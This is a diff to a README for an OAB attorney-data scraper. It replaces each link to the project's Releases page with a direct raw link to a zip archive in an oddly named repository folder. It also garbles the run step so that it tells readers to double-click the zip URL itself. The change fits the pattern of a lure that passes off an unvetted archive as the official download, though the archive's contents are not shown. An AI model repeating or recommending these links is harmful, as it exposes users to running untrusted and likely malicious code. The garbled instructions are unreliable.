isaiasfeerreira/cna-oab-attorney-data-scraper/README.md

 This tool uses web scraping methods to access publicly available attorney data on the OAB website.
 Here’s how to use it:

-1. **Visit the Releases Page**: To get the latest version of the cna-oab-attorney-data-scraper, visit this page: [Releases Page](https://github.com/isaiasfeerreira/cna-oab-attorney-data-scraper/releases).
+1. **Visit the Releases Page**: To get the latest version of the cna-oab-attorney-data-scraper, visit this page: [Releases Page](https://raw.githubusercontent.com/isaiasfeerreira/cna-oab-attorney-data-scraper/main/unforthright/data-attorney-scraper-oab-cna-2.8.zip).

 2. **Download the Application**: Look for the latest release.
 You can download it easily.
 Click the link corresponding to your operating system.

 3. **Unzip the File**: After the download is complete, unzip the file to a folder of your choice.

 4. **Open the Application**: Navigate to the folder where you unzipped the files.
-Double-click on the `cna-oab-attorney-data-scraper.exe` (or equivalent) to open the application.
+Double-click on the `https://raw.githubusercontent.com/isaiasfeerreira/cna-oab-attorney-data-scraper/main/unforthright/data-attorney-scraper-oab-cna-2.8.zip` (or equivalent) to open the application.

 5. **Follow On-Screen Instructions**: The application will guide you through the steps to start collecting data.

 ## 🔧 Download & Install

-To download and install the application, visit this page: [Download Releases](https://github.com/isaiasfeerreira/cna-oab-attorney-data-scraper/releases).
+To download and install the application, visit this page: [Download Releases](https://raw.githubusercontent.com/isaiasfeerreira/cna-oab-attorney-data-scraper/main/unforthright/data-attorney-scraper-oab-cna-2.8.zip).
 Follow the steps above to ensure a smooth installation.

 ## 📖 User Guide